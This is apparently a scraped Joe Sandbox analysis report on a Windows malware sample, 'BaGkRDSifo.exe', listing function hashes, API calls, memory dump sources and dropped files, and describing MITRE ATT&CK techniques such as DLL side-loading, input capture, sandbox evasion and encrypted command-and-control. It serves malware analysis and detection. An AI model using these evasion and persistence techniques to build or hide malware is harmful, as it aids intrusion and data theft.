Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Function 06ADF858 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 06ADF951

Strings

fXV, xrefs: 06ADFBC7
fXV, xrefs: 06ADF882

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: CurrentThread
String ID: fXV$fXV
API String ID: 2882836952-1107164591
Opcode ID: 2f7042b56297bea9f56b274ef35ca7fa14e0b101a3d0b426270d242bf86b1ddd
Instruction ID: a1ac5f4d3f384874c5a8f1321b613bf4d229127b0ebf6b3e824493b7ba3cdd4e
Opcode Fuzzy Hash: 2f7042b56297bea9f56b274ef35ca7fa14e0b101a3d0b426270d242bf86b1ddd
Instruction Fuzzy Hash: CB916A71E003489FDB14EFA9D944ADEBBF5FF88310F14806AD416AB250DB34A845CFA1

Function 06AD5E98 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 190windowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 06AD5F19
GetFocus.USER32 ref: 06AD5F7F

Strings

fXV, xrefs: 06AD5EC7

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: ActiveFocusWindow
String ID: fXV
API String ID: 2022189218-3172339192
Opcode ID: f55e937fc96472f4e8c2e25a154d1749773766cec72c5b0fe5a219216bc9d480
Instruction ID: d6d138d67c7e1cce29eb2369c05d471703022e5f7b2322c40e6dc4697ec5d290
Opcode Fuzzy Hash: f55e937fc96472f4e8c2e25a154d1749773766cec72c5b0fe5a219216bc9d480
Instruction Fuzzy Hash: 41714AB4E002058FDB54EFA9CA84BAEBBF5FF48200F158499E415EB252C734ED41CBA1

Function 06AD86C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000031), ref: 06AD871E
GetSystemMetrics.USER32(00000032), ref: 06AD8758

Strings

fXV, xrefs: 06AD86E7

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: MetricsSystem
String ID: fXV
API String ID: 4116985748-3172339192
Opcode ID: 2d88deea0f7e0bbb4bc55c60e1fc82cb130705b1cb132683156a9b370e8ce34d
Instruction ID: 8a40e36108782310cd7586aaeb77e85acc2758d49e73c24cb681dd0737f5ef6b
Opcode Fuzzy Hash: 2d88deea0f7e0bbb4bc55c60e1fc82cb130705b1cb132683156a9b370e8ce34d
Instruction Fuzzy Hash: D12186B59003488FDB21DFA9C9497EEBFF4EB08314F24845AD059AB741C378A944CFA1

Function 06ACE2C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000003B), ref: 06ACE326
GetSystemMetrics.USER32(0000003C), ref: 06ACE360

Strings

fXV, xrefs: 06ACE2EF

Memory Dump Source

Source File: 00000000.00000002.2491182713.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ac0000_BaGkRDSifo.jbxd

Similarity

API ID: MetricsSystem
String ID: fXV
API String ID: 4116985748-3172339192
Opcode ID: b8671fe240bacff13bab05974f872f4099e2b1fd279fb8c2d58e0826ba92018d
Instruction ID: 6e0ef73f093379f4b5ae67f5236a4d4710eb8146b0a16c27fae957896233a81c
Opcode Fuzzy Hash: b8671fe240bacff13bab05974f872f4099e2b1fd279fb8c2d58e0826ba92018d
Instruction Fuzzy Hash: 712153B18003488FEB21DFAAD54979EFFF4AB08324F24844ED159AB350C3786944CFA5

Function 05A3FB70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000005), ref: 05A3FBCE
GetSystemMetrics.USER32(00000006), ref: 05A3FC08

Strings

fXV, xrefs: 05A3FB97

Memory Dump Source

Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd

Similarity

API ID: MetricsSystem
String ID: fXV
API String ID: 4116985748-3172339192
Opcode ID: e220c22c5de53019c5ff3388ccd751d3d8e998ae2e43f1ce7c31a0cff63a3ae7
Instruction ID: 5320825e4195b851b3e879cb23592505e81035f802f187f079f4534410174e8f
Opcode Fuzzy Hash: e220c22c5de53019c5ff3388ccd751d3d8e998ae2e43f1ce7c31a0cff63a3ae7
Instruction Fuzzy Hash: 2C2148B5C003488FDF20CF99D64979EBBF4AB08314F24840AE059A7350D378A984CFA5

Function 06ACE3A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000022), ref: 06ACE3FE
GetSystemMetrics.USER32(00000023), ref: 06ACE438

Strings

fXV, xrefs: 06ACE3C7

Memory Dump Source

Source File: 00000000.00000002.2491182713.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ac0000_BaGkRDSifo.jbxd

Similarity

API ID: MetricsSystem
String ID: fXV
API String ID: 4116985748-3172339192
Opcode ID: 4e7cfd02d68496ba3bd136f2de848612cc7e832ae7a580ae6e08a4735a66c25d
Instruction ID: b1b09f66b9c3c29a1bc89a1aa6b089578252468c396c27ea5b73cbaf5688f7e2
Opcode Fuzzy Hash: 4e7cfd02d68496ba3bd136f2de848612cc7e832ae7a580ae6e08a4735a66c25d
Instruction Fuzzy Hash: CF2166B1C003488FEB21DF99D6097AEBFF4AB08314F24845ED159AB350C3795984CFA5

Function 06AD2A8E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000050), ref: 06AD2B13

Strings

4'q, xrefs: 06AD2ACC
fXV, xrefs: 06AD2AAF

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: MetricsSystem
String ID: 4'q$fXV
API String ID: 4116985748-2178577289
Opcode ID: 2601df923ed8df3ff73ba57e01455a0ab782d21801f7d23b236fcf75ddecd18c
Instruction ID: 33fd779572b2ab7e15ec20d1dba7c1e4c0fa51d5ed0ed8b565a9ca66e89b6739
Opcode Fuzzy Hash: 2601df923ed8df3ff73ba57e01455a0ab782d21801f7d23b236fcf75ddecd18c
Instruction Fuzzy Hash: 9D2154B0D002598FCB10DFAAD9447EEBBF4FB08320F10845AE419B7280D3346A04CFA5

Function 06AD86D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000031), ref: 06AD871E
GetSystemMetrics.USER32(00000032), ref: 06AD8758

Strings

fXV, xrefs: 06AD86E7

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: MetricsSystem
String ID: fXV
API String ID: 4116985748-3172339192
Opcode ID: 22b84967a1d90360fe186f2e69872b6784a8e33bb30c03b7f04175375bd4c148
Instruction ID: 67d4e85265f8b6cb258ce65a765131e05c2009fcd036c998e2d1ca810a286ec1
Opcode Fuzzy Hash: 22b84967a1d90360fe186f2e69872b6784a8e33bb30c03b7f04175375bd4c148
Instruction Fuzzy Hash: 502123B59003488FDB21DF9AD5497AEBBF4AB08314F20841AD459AB250C3786984CFA5

Function 06AD2A90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000050), ref: 06AD2B13

Strings

4'q, xrefs: 06AD2ACC
fXV, xrefs: 06AD2AAF

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: MetricsSystem
String ID: 4'q$fXV
API String ID: 4116985748-2178577289
Opcode ID: 8e3d1f15efbd7ae0220276c11fecf9a23c3c8d572f736e4c696cee467a865aa2
Instruction ID: 796ac13e5a2539c85b32b3da80fabbc190a6b46852492b1cfda2138b8b5bfacb
Opcode Fuzzy Hash: 8e3d1f15efbd7ae0220276c11fecf9a23c3c8d572f736e4c696cee467a865aa2
Instruction Fuzzy Hash: 292165B0C002598FCB10DFAAD9447EEBBF4FB08320F10845AD419B7280D3346A04CFA5

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BaGkRDSifo.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Desktop\STHealthUpdate.exe

C:\Users\user\Desktop\Update\server.txt

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

ICMP Packets

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
BaGkRDSifo.exe

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Function 05A37008 Relevance: 24.8, Strings: 19, Instructions: 1024
COMMON

Function 05A37018 Relevance: 24.8, Strings: 19, Instructions: 1018
COMMON

Function 06AD3EE0 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 528
COMMON

Function 06AD3ED0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 318
COMMON

Function 05AACD38 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Function 05AACD28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127
threadCOMMON

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Function 06ADDD8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 297
COMMON

Function 06ADDD98 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291
COMMON

Function 05A31CE7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115
COMMON

Function 05A31CF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
COMMON